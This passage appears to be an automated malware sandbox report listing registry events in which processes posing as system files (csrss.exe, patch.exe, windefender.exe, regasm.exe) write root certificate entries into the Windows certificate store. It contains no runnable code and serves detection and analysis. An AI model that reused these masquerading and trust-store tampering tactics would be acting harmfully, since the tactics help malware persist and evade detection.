| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
